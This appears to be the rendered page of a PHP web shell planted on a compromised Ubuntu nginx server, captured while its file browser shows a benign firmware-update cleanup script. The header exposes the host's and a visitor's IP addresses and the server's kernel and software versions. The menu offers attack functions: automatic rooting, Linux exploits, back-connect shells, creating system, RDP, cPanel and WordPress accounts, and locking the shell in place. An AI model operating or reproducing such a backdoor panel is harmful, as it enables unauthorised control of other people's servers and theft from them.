Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
snap /
core /
17212 /
usr /
lib /
fwupdate /
[ HOME SHELL ]
Name
Size
Permission
Action
cleanup
665
B
-rwxr-xr-x
fwupx64.efi
64.08
KB
-rw-r--r--
fwupx64.efi.signed
65.95
KB
-rw-r--r--
install
1.28
KB
-rwxr-xr-x
version
13
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cleanup
#!/bin/sh set -e if [ -e "/var/cache/fwupdate/done" ]; then exit 0 fi efibootmgr -q BOOTNUM=$(efibootmgr | grep "Linux.Firmware.Updater" | sed "s/\ .*//; s/*//; s/Boot//") if [ -n "$BOOTNUM" ]; then for num in $BOOTNUM; do efibootmgr -q -b $num -B done fi for x in /boot/efi/EFI/ubuntu/fw/fwupdate-* ; do if [ "${x}" != "/boot/efi/EFI/ubuntu/fw/fwupdate-*" ]; then rm -f "${x}" fi done for x in /sys/firmware/efi/efivars/fwupdate-*-0abba7dc-e516-4167-bbf5-4d9d1c739416 ; do if [ "${x}" != "/sys/firmware/efi/efivars/fwupdate-*-0abba7dc-e516-4167-bbf5-4d9d1c739416" ]; then chattr -i "${x}" rm -f "${x}" fi done touch "/var/cache//fwupdate/done"
Close